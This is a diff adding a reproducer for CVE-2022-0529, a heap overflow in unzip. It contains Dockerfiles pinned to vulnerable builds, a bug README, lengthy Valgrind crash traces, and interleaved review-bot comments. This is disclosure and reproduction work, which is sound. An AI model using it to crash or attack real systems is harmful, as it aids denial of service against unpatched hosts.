diff --git a/cve/unzip/2022/CVE-2022-0529/Dockerfile-fedora b/cve/unzip/2022/CVE-2022-0529/Dockerfile-fedora
new file mode 100644
index 0000000000000000000000000000000000000000..27b138710977475506c1f4f6f4577106b83f6a80
--- /dev/null
+++ b/cve/unzip/2022/CVE-2022-0529/Dockerfile-fedora
@@ -0,0 +1,4 @@
+FROM fedora:35
+
+RUN dnf install -y yum-utils valgrind unzip
+RUN debuginfo-install -y unzip
diff --git a/cve/unzip/2022/CVE-2022-0529/Dockerfile-ubuntu b/cve/unzip/2022/CVE-2022-0529/Dockerfile-ubuntu
new file mode 100644
index 0000000000000000000000000000000000000000..63f22735c74af6d6b55bf971ed7d7758833050c1
--- /dev/null
+++ b/cve/unzip/2022/CVE-2022-0529/Dockerfile-ubuntu
@@ -0,0 +1,11 @@
+FROM ubuntu:20.04
+ENV DEBIAN_FRONTEND noninteractive
+
+RUN apt update && apt install lsb-core ubuntu-dbgsym-keyring debian-goodies -y
+RUN apt-key adv --keyserver keyserver.ubuntu.com --recv-keys F2EDC64DC5AEE1F6B9C621F0C8CAB6595FDFF622
+RUN echo "deb http://ddebs.ubuntu.com $(lsb_release -cs) main restricted universe multiverse \
+  deb http://ddebs.ubuntu.com $(lsb_release -cs)-updates main restricted universe multiverse \
+  deb http://ddebs.ubuntu.com $(lsb_release -cs)-proposed main restricted universe multiverse" | \
+  tee -a /etc/apt/sources.list.d/ddebs.list
+
+RUN apt update && apt install valgrind libbz2-1.0-dbgsym unzip-dbgsym -y
diff --git a/cve/unzip/2022/CVE-2022-0529/README.txt b/cve/unzip/2022/CVE-2022-0529/README.txt
new file mode 100644
index 0000000000000000000000000000000000000000..804d27e7c05a10387cd732c3f43ce5d9cba3439c
--- /dev/null
+++ b/cve/unzip/2022/CVE-2022-0529/README.txt
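Review bot: `RUN dnf install -y yum-utils valgrind unzip` installs whatever unzip build the mirror serves at build time, so nothing in the image pins it to the build the README reproduces against (`unzip-6.0-53.fc35` per the `yum info` output); once a fixed build is published the reproducer can silently stop crashing. Pin it, e.g. `RUN dnf install -y yum-utils valgrind unzip-6.0-53.fc35 && dnf clean all`, and point `debuginfo-install` at the same version. fedora:35 is, as far as I know, past end of life, so a comment noting that its repositories may have moved to archive mirrors would save the next person a confusing build failure.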
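Review bot: The three `deb` entries inside the `RUN echo "deb http://ddebs.ubuntu.com ..." | tee -a` step are separated only by Dockerfile `\` continuations, which the Dockerfile parser removes before the shell sees the command, so as far as I can tell all three end up on a single line of `ddebs.list` (one `deb` entry whose trailing tokens are parsed as component names) instead of three entries; one argument per suite to `printf '%s\n'` avoids that. The `apt-key adv --keyserver keyserver.ubuntu.com --recv-keys ...` line is an unauthenticated HKP key fetch that is also redundant, because `ubuntu-dbgsym-keyring` on the preceding line already ships that key, and `apt-key` is deprecated. The `-proposed` suite does not belong in a reproducer, and the unpinned `unzip-dbgsym` (and the unzip it depends on) will drift to a patched build once the distribution ships a fix — the README records `6.0-25ubuntu1` from focal/main, so pin that. `ENV DEBIAN_FRONTEND noninteractive` uses the legacy key-value form and bakes a build-only setting into the runtime image; `ARG DEBIAN_FRONTEND=noninteractive` does the same job at build time only.
```dockerfile
FROM ubuntu:20.04
ARG DEBIAN_FRONTEND=noninteractive

RUN apt-get update && apt-get install -y lsb-core ubuntu-dbgsym-keyring debian-goodies
# ubuntu-dbgsym-keyring already provides the ddebs signing key; no apt-key fetch needed.
RUN printf '%s\n' \
        "deb http://ddebs.ubuntu.com $(lsb_release -cs) main restricted universe multiverse" \
        "deb http://ddebs.ubuntu.com $(lsb_release -cs)-updates main restricted universe multiverse" \
        > /etc/apt/sources.list.d/ddebs.list

# Pin to the build the README reproduces against; a newer unzip may carry the fix.
RUN apt-get update && apt-get install -y valgrind libbz2-1.0-dbgsym \
        unzip=6.0-25ubuntu1 unzip-dbgsym=6.0-25ubuntu1
```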
@@ -0,0 +1,520 @@
+Heap out-of-bound writes and reads during conversion of wide string to local string
+
+# Description
+During extraction of the attached zip archive via
+```
+unzip $PWD/testcase
+```
+out-of-bounds reads and writes happen on an heap-allocated buffer. The bug is located
+in the code that is responsible for converting wide strings to local strings.
+
+This bug allows an attacker to perform a denial of service and possibly opens up
+other attack vectors.
+
+To reproduce the crash, we provide scripts alongside the crashing input:
+- ./reproduce-fedora.sh: Reproduce crash via a Fedora 35 docker container
+- ./reproduce-ubuntu.sh: Reproduce crash via a Ubuntu 20.04 docker container
+
+If you need further details, we are happy to assist where possible.
+
+# yum info unzip
+Last metadata expiration check: 0:04:07 ago on Mon Jan 31 12:39:57 2022.
+Installed Packages
+Name : unzip
+Version : 6.0
+Release : 53.fc35
+Architecture : x86_64
+Size : 385 k
+Source : unzip-6.0-53.fc35.src.rpm
+Repository : @System
+From repo : fedora
+Summary : A utility for unpacking zip files
+URL : http://www.info-zip.org/UnZip.html
+License : BSD
+Description : The unzip utility is used to list, test, or extract files from a zip
+ : archive. Zip archives are commonly found on MS-DOS systems. The zip
+ : utility, included in the zip package, creates zip archives. Zip and
+ : unzip are both compatible with archives created by PKWARE(R)'s PKZIP
+ : for MS-DOS, but the programs' options and default behaviors do differ
+ : in some respects.
+ :
+ : Install the unzip package if you need to list, test or extract files from
+ : a zip archive.
+
+# valgrind fedora
+==1== Memcheck, a memory error detector
+==1== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
+==1== Using Valgrind-3.18.1 and LibVEX; rerun with -h for copyright info +==1== Command: unzip /testcase +==1== +Archive: /testcase +warning [/testcase]: 303 extra bytes at beginning or within zipfile + (attempting to process anyway) +error [/testcase]: reported length of central directory is + -303 bytes too long (Atari STZip zipfile? J.H.Holm ZIPSPLIT 1.1 + zipfile?). Compensating... +==1== Invalid write of size 1 +==1== at 0x484732C: strcat (vg_replace_strmem.c:330) +==1== by 0x11CD25: UnknownInlinedFun (string_fortified.h:127) +==1== by 0x11CD25: UnknownInlinedFun (process.c:2547) +==1== by 0x11CD25: UnknownInlinedFun (process.c:2600) +==1== by 0x11CD25: do_string.part.0 (fileio.c:2361) +==1== by 0x119E35: UnknownInlinedFun (fileio.c:2041) +==1== by 0x119E35: extract_or_test_files (extract.c:659) +==1== by 0x1253D6: do_seekable.lto_priv.0 (process.c:994) +==1== by 0x10E51E: UnknownInlinedFun (process.c:401) +==1== by 0x10E51E: UnknownInlinedFun (unzip.c:1279) +==1== by 0x10E51E: main (unzip.c:742) +==1== Address 0x4a8a3c9 is 0 bytes after a block of size 601 alloc'd +==1== at 0x484186F: malloc (vg_replace_malloc.c:381) +==1== by 0x11CC98: UnknownInlinedFun (process.c:2508) +==1== by 0x11CC98: UnknownInlinedFun (process.c:2600) +==1== by 0x11CC98: do_string.part.0 (fileio.c:2361) +==1== by 0x119E35: UnknownInlinedFun (fileio.c:2041) +==1== by 0x119E35: extract_or_test_files (extract.c:659) +==1== by 0x1253D6: do_seekable.lto_priv.0 (process.c:994) +==1== by 0x10E51E: UnknownInlinedFun (process.c:401) +==1== by 0x10E51E: UnknownInlinedFun (unzip.c:1279) +==1== by 0x10E51E: main (unzip.c:742) +==1== +==1== Invalid write of size 1 +==1== at 0x484733E: strcat (vg_replace_strmem.c:330) +==1== by 0x11CD25: UnknownInlinedFun (string_fortified.h:127) +==1== by 0x11CD25: UnknownInlinedFun (process.c:2547) +==1== by 0x11CD25: UnknownInlinedFun (process.c:2600) +==1== by 0x11CD25: do_string.part.0 (fileio.c:2361) +==1== by 0x119E35: UnknownInlinedFun (fileio.c:2041) 
+==1== by 0x119E35: extract_or_test_files (extract.c:659) +==1== by 0x1253D6: do_seekable.lto_priv.0 (process.c:994) +==1== by 0x10E51E: UnknownInlinedFun (process.c:401) +==1== by 0x10E51E: UnknownInlinedFun (unzip.c:1279) +==1== by 0x10E51E: main (unzip.c:742) +==1== Address 0x4a8a3d2 is 9 bytes after a block of size 601 alloc'd +==1== at 0x484186F: malloc (vg_replace_malloc.c:381) +==1== by 0x11CC98: UnknownInlinedFun (process.c:2508) +==1== by 0x11CC98: UnknownInlinedFun (process.c:2600) +==1== by 0x11CC98: do_string.part.0 (fileio.c:2361) +==1== by 0x119E35: UnknownInlinedFun (fileio.c:2041) +==1== by 0x119E35: extract_or_test_files (extract.c:659) +==1== by 0x1253D6: do_seekable.lto_priv.0 (process.c:994) +==1== by 0x10E51E: UnknownInlinedFun (process.c:401) +==1== by 0x10E51E: UnknownInlinedFun (unzip.c:1279) +==1== by 0x10E51E: main (unzip.c:742) +==1== +==1== Invalid read of size 1 +==1== at 0x4847314: strcat (vg_replace_strmem.c:330) +==1== by 0x11CD25: UnknownInlinedFun (string_fortified.h:127) +==1== by 0x11CD25: UnknownInlinedFun (process.c:2547) +==1== by 0x11CD25: UnknownInlinedFun (process.c:2600) +==1== by 0x11CD25: do_string.part.0 (fileio.c:2361) +==1== by 0x119E35: UnknownInlinedFun (fileio.c:2041) +==1== by 0x119E35: extract_or_test_files (extract.c:659) +==1== by 0x1253D6: do_seekable.lto_priv.0 (process.c:994) +==1== by 0x10E51E: UnknownInlinedFun (process.c:401) +==1== by 0x10E51E: UnknownInlinedFun (unzip.c:1279) +==1== by 0x10E51E: main (unzip.c:742) +==1== Address 0x4a8a3c9 is 0 bytes after a block of size 601 alloc'd +==1== at 0x484186F: malloc (vg_replace_malloc.c:381) +==1== by 0x11CC98: UnknownInlinedFun (process.c:2508) +==1== by 0x11CC98: UnknownInlinedFun (process.c:2600) +==1== by 0x11CC98: do_string.part.0 (fileio.c:2361) +==1== by 0x119E35: UnknownInlinedFun (fileio.c:2041) +==1== by 0x119E35: extract_or_test_files (extract.c:659) +==1== by 0x1253D6: do_seekable.lto_priv.0 (process.c:994) +==1== by 0x10E51E: UnknownInlinedFun 
(process.c:401) +==1== by 0x10E51E: UnknownInlinedFun (unzip.c:1279) +==1== by 0x10E51E: main (unzip.c:742) +==1== +==1== Invalid read of size 1 +==1== at 0x4847604: strlen (vg_replace_strmem.c:494) +==1== by 0x11CE8C: UnknownInlinedFun (process.c:2551) +==1== by 0x11CE8C: UnknownInlinedFun (process.c:2600) +==1== by 0x11CE8C: do_string.part.0 (fileio.c:2361) +==1== by 0x119E35: UnknownInlinedFun (fileio.c:2041) +==1== by 0x119E35: extract_or_test_files (extract.c:659) +==1== by 0x1253D6: do_seekable.lto_priv.0 (process.c:994) +==1== by 0x10E51E: UnknownInlinedFun (process.c:401) +==1== by 0x10E51E: UnknownInlinedFun (unzip.c:1279) +==1== by 0x10E51E: main (unzip.c:742) +==1== Address 0x4a8a3c9 is 0 bytes after a block of size 601 alloc'd +==1== at 0x484186F: malloc (vg_replace_malloc.c:381) +==1== by 0x11CC98: UnknownInlinedFun (process.c:2508) +==1== by 0x11CC98: UnknownInlinedFun (process.c:2600) +==1== by 0x11CC98: do_string.part.0 (fileio.c:2361) +==1== by 0x119E35: UnknownInlinedFun (fileio.c:2041) +==1== by 0x119E35: extract_or_test_files (extract.c:659) +==1== by 0x1253D6: do_seekable.lto_priv.0 (process.c:994) +==1== by 0x10E51E: UnknownInlinedFun (process.c:401) +==1== by 0x10E51E: UnknownInlinedFun (unzip.c:1279) +==1== by 0x10E51E: main (unzip.c:742) +==1== +==1== Invalid read of size 8 +==1== at 0x484B214: memmove (vg_replace_strmem.c:1382) +==1== by 0x11CEAE: UnknownInlinedFun (string_fortified.h:79) +==1== by 0x11CEAE: UnknownInlinedFun (process.c:2552) +==1== by 0x11CEAE: UnknownInlinedFun (process.c:2600) +==1== by 0x11CEAE: do_string.part.0 (fileio.c:2361) +==1== by 0x119E35: UnknownInlinedFun (fileio.c:2041) +==1== by 0x119E35: extract_or_test_files (extract.c:659) +==1== by 0x1253D6: do_seekable.lto_priv.0 (process.c:994) +==1== by 0x10E51E: UnknownInlinedFun (process.c:401) +==1== by 0x10E51E: UnknownInlinedFun (unzip.c:1279) +==1== by 0x10E51E: main (unzip.c:742) +==1== Address 0x4a8a3d0 is 7 bytes after a block of size 601 alloc'd +==1== at 
0x484186F: malloc (vg_replace_malloc.c:381) +==1== by 0x11CC98: UnknownInlinedFun (process.c:2508) +==1== by 0x11CC98: UnknownInlinedFun (process.c:2600) +==1== by 0x11CC98: do_string.part.0 (fileio.c:2361) +==1== by 0x119E35: UnknownInlinedFun (fileio.c:2041) +==1== by 0x119E35: extract_or_test_files (extract.c:659) +==1== by 0x1253D6: do_seekable.lto_priv.0 (process.c:994) +==1== by 0x10E51E: UnknownInlinedFun (process.c:401) +==1== by 0x10E51E: UnknownInlinedFun (unzip.c:1279) +==1== by 0x10E51E: main (unzip.c:742) +==1== +==1== Invalid read of size 8 +==1== at 0x484B21F: memmove (vg_replace_strmem.c:1382) +==1== by 0x11CEAE: UnknownInlinedFun (string_fortified.h:79) +==1== by 0x11CEAE: UnknownInlinedFun (process.c:2552) +==1== by 0x11CEAE: UnknownInlinedFun (process.c:2600) +==1== by 0x11CEAE: do_string.part.0 (fileio.c:2361) +==1== by 0x119E35: UnknownInlinedFun (fileio.c:2041) +==1== by 0x119E35: extract_or_test_files (extract.c:659) +==1== by 0x1253D6: do_seekable.lto_priv.0 (process.c:994) +==1== by 0x10E51E: UnknownInlinedFun (process.c:401) +==1== by 0x10E51E: UnknownInlinedFun (unzip.c:1279) +==1== by 0x10E51E: main (unzip.c:742) +==1== Address 0x4a8a3d8 is 15 bytes after a block of size 601 alloc'd +==1== at 0x484186F: malloc (vg_replace_malloc.c:381) +==1== by 0x11CC98: UnknownInlinedFun (process.c:2508) +==1== by 0x11CC98: UnknownInlinedFun (process.c:2600) +==1== by 0x11CC98: do_string.part.0 (fileio.c:2361) +==1== by 0x119E35: UnknownInlinedFun (fileio.c:2041) +==1== by 0x119E35: extract_or_test_files (extract.c:659) +==1== by 0x1253D6: do_seekable.lto_priv.0 (process.c:994) +==1== by 0x10E51E: UnknownInlinedFun (process.c:401) +==1== by 0x10E51E: UnknownInlinedFun (unzip.c:1279) +==1== by 0x10E51E: main (unzip.c:742) +==1== +==1== Invalid read of size 8 +==1== at 0x484B227: memmove (vg_replace_strmem.c:1382) +==1== by 0x11CEAE: UnknownInlinedFun (string_fortified.h:79) +==1== by 0x11CEAE: UnknownInlinedFun (process.c:2552) +==1== by 0x11CEAE: 
UnknownInlinedFun (process.c:2600) +==1== by 0x11CEAE: do_string.part.0 (fileio.c:2361) +==1== by 0x119E35: UnknownInlinedFun (fileio.c:2041) +==1== by 0x119E35: extract_or_test_files (extract.c:659) +==1== by 0x1253D6: do_seekable.lto_priv.0 (process.c:994) +==1== by 0x10E51E: UnknownInlinedFun (process.c:401) +==1== by 0x10E51E: UnknownInlinedFun (unzip.c:1279) +==1== by 0x10E51E: main (unzip.c:742) +==1== Address 0x4a8a3e0 is 23 bytes after a block of size 601 alloc'd +==1== at 0x484186F: malloc (vg_replace_malloc.c:381) +==1== by 0x11CC98: UnknownInlinedFun (process.c:2508) +==1== by 0x11CC98: UnknownInlinedFun (process.c:2600) +==1== by 0x11CC98: do_string.part.0 (fileio.c:2361) +==1== by 0x119E35: UnknownInlinedFun (fileio.c:2041) +==1== by 0x119E35: extract_or_test_files (extract.c:659) +==1== by 0x1253D6: do_seekable.lto_priv.0 (process.c:994) +==1== by 0x10E51E: UnknownInlinedFun (process.c:401) +==1== by 0x10E51E: UnknownInlinedFun (unzip.c:1279) +==1== by 0x10E51E: main (unzip.c:742) +==1== + +valgrind: m_mallocfree.c:303 (get_bszB_as_is): Assertion 'bszB_lo == bszB_hi' failed. +valgrind: Heap block lo/hi size mismatch: lo = 672, hi = 3689347702328406576. +This is probably caused by your program erroneously writing past the +end of a heap block and corrupting heap metadata. If you fix any +invalid writes reported by Memcheck, this assertion failure will +probably go away. Please try that before reporting this as a bug. + + +host stacktrace: +==1== at 0x580428CA: ??? (in /usr/libexec/valgrind/memcheck-amd64-linux) +==1== by 0x580429F7: ??? (in /usr/libexec/valgrind/memcheck-amd64-linux) +==1== by 0x58042B9B: ??? (in /usr/libexec/valgrind/memcheck-amd64-linux) +==1== by 0x5804C8EF: ??? (in /usr/libexec/valgrind/memcheck-amd64-linux) +==1== by 0x5803AF1A: ??? (in /usr/libexec/valgrind/memcheck-amd64-linux) +==1== by 0x58039637: ??? (in /usr/libexec/valgrind/memcheck-amd64-linux) +==1== by 0x5803DFBD: ??? 
(in /usr/libexec/valgrind/memcheck-amd64-linux) +==1== by 0x580388E8: ??? (in /usr/libexec/valgrind/memcheck-amd64-linux) +==1== by 0x5800F344: ??? (in /usr/libexec/valgrind/memcheck-amd64-linux) +==1== by 0x1002DF0984: ??? +==1== by 0x1002CB5F2F: ??? +==1== by 0x581FCDA3: ??? (in /usr/libexec/valgrind/memcheck-amd64-linux) +==1== by 0x1002CB5F17: ??? +==1== by 0x1002CB5F2F: ??? + +sched status: + running_tid=1 + +Thread 1: status = VgTs_Runnable (lwpid 1) +==1== at 0x484B22F: memmove (vg_replace_strmem.c:1382) +==1== by 0x11CEAE: UnknownInlinedFun (string_fortified.h:79) +==1== by 0x11CEAE: UnknownInlinedFun (process.c:2552) +==1== by 0x11CEAE: UnknownInlinedFun (process.c:2600) +==1== by 0x11CEAE: do_string.part.0 (fileio.c:2361) +==1== by 0x119E35: UnknownInlinedFun (fileio.c:2041) +==1== by 0x119E35: extract_or_test_files (extract.c:659) +==1== by 0x1253D6: do_seekable.lto_priv.0 (process.c:994) +==1== by 0x10E51E: UnknownInlinedFun (process.c:401) +==1== by 0x10E51E: UnknownInlinedFun (unzip.c:1279) +==1== by 0x10E51E: main (unzip.c:742) +client stack range: [0x1FFEFFE000 0x1FFF000FFF] client SP: 0x1FFF000868 +valgrind stack range: [0x1002BB6000 0x1002CB5FFF] top usage: 8656 of 1048576 + + +# apt-show unzip +Package: unzip +Version: 6.0-25ubuntu1 +Priority: optional +Section: utils +Origin: Ubuntu +Maintainer: Ubuntu Developers +Original-Maintainer: Santiago Vila +Bugs: https://bugs.launchpad.net/ubuntu/+filebug +Installed-Size: 593 kB +Depends: libbz2-1.0, libc6 (>= 2.14) +Suggests: zip +Homepage: http://www.info-zip.org/UnZip.html +Task: ubuntu-desktop-minimal, ubuntu-desktop, kubuntu-desktop, xubuntu-core, xubuntu-desktop, lubuntu-desktop, ubuntustudio-desktop-core, ubuntustudio-desktop, ubuntukylin-desktop, ubuntu-mate-core, ubuntu-mate-desktop, ubuntu-budgie-desktop +Download-Size: 169 kB +APT-Manual-Installed: yes +APT-Sources: http://archive.ubuntu.com/ubuntu focal/main amd64 Packages +Description: De-archiver for .zip files + +# valgrind Ubuntu +==1== 
Memcheck, a memory error detector +==1== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al. +==1== Using Valgrind-3.15.0 and LibVEX; rerun with -h for copyright info +==1== Command: unzip /testcase +==1== +Archive: /testcase +warning [/testcase]: 303 extra bytes at beginning or within zipfile + (attempting to process anyway) +error [/testcase]: reported length of central directory is + -303 bytes too long (Atari STZip zipfile? J.H.Holm ZIPSPLIT 1.1 + zipfile?). Compensating... +==1== Invalid write of size 1 +==1== at 0x483EC4C: strcat (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) +==1== by 0x11E65D: strcat (string_fortified.h:128) +==1== by 0x11E65D: wide_to_local_string (process.c:2555) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== Address 0x4a6c3c9 is 0 bytes after a block of size 601 alloc'd +==1== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) +==1== by 0x11E609: wide_to_local_string (process.c:2516) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== +==1== Invalid write of size 1 +==1== at 0x483EC5E: strcat (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) +==1== by 0x11E65D: strcat (string_fortified.h:128) +==1== by 0x11E65D: wide_to_local_string (process.c:2555) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 
0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== Address 0x4a6c3d2 is 9 bytes after a block of size 601 alloc'd +==1== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) +==1== by 0x11E609: wide_to_local_string (process.c:2516) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== +==1== Invalid read of size 1 +==1== at 0x483EC34: strcat (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) +==1== by 0x11E65D: strcat (string_fortified.h:128) +==1== by 0x11E65D: wide_to_local_string (process.c:2555) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== Address 0x4a6c3c9 is 0 bytes after a block of size 601 alloc'd +==1== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) +==1== by 0x11E609: wide_to_local_string (process.c:2516) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: 
unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== +==1== Conditional jump or move depends on uninitialised value(s) +==1== at 0x11E6B7: wide_to_local_string (process.c:2559) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== +==1== Invalid read of size 4 +==1== at 0x11E6A2: wide_to_local_string (process.c:2559) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== Address 0x4a6c3cc is 3 bytes after a block of size 601 alloc'd +==1== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) +==1== by 0x11E609: wide_to_local_string (process.c:2516) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== +==1== Invalid read of size 4 +==1== at 0x11E6B7: wide_to_local_string (process.c:2559) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) 
+==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== Address 0x4a6c3d0 is 7 bytes after a block of size 601 alloc'd +==1== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) +==1== by 0x11E609: wide_to_local_string (process.c:2516) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== +==1== Invalid read of size 8 +==1== at 0x4842A7C: memmove (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) +==1== by 0x11E6FA: strcpy (string_fortified.h:90) +==1== by 0x11E6FA: wide_to_local_string (process.c:2560) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== Address 0x4a6c3d0 is 7 bytes after a block of size 601 alloc'd +==1== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) +==1== by 0x11E609: wide_to_local_string (process.c:2516) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== +==1== Invalid read of size 8 +==1== at 0x4842A87: memmove (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) +==1== by 0x11E6FA: strcpy 
(string_fortified.h:90) +==1== by 0x11E6FA: wide_to_local_string (process.c:2560) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== Address 0x4a6c3d8 is 15 bytes after a block of size 601 alloc'd +==1== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) +==1== by 0x11E609: wide_to_local_string (process.c:2516) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== +==1== Invalid read of size 8 +==1== at 0x4842A8F: memmove (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) +==1== by 0x11E6FA: strcpy (string_fortified.h:90) +==1== by 0x11E6FA: wide_to_local_string (process.c:2560) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: extract_or_test_files (extract.c:658) +==1== by 0x11C830: do_seekable (process.c:994) +==1== by 0x11D796: process_zipfiles (process.c:401) +==1== by 0x10EB36: unzip (unzip.c:1278) +==1== by 0x48890B2: (below main) (libc-start.c:308) +==1== Address 0x4a6c3e0 is 23 bytes after a block of size 601 alloc'd +==1== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) +==1== by 0x11E609: wide_to_local_string (process.c:2516) +==1== by 0x11E800: utf8_to_local_string (process.c:2608) +==1== by 0x117D50: do_string (fileio.c:2362) +==1== by 0x114CA3: 
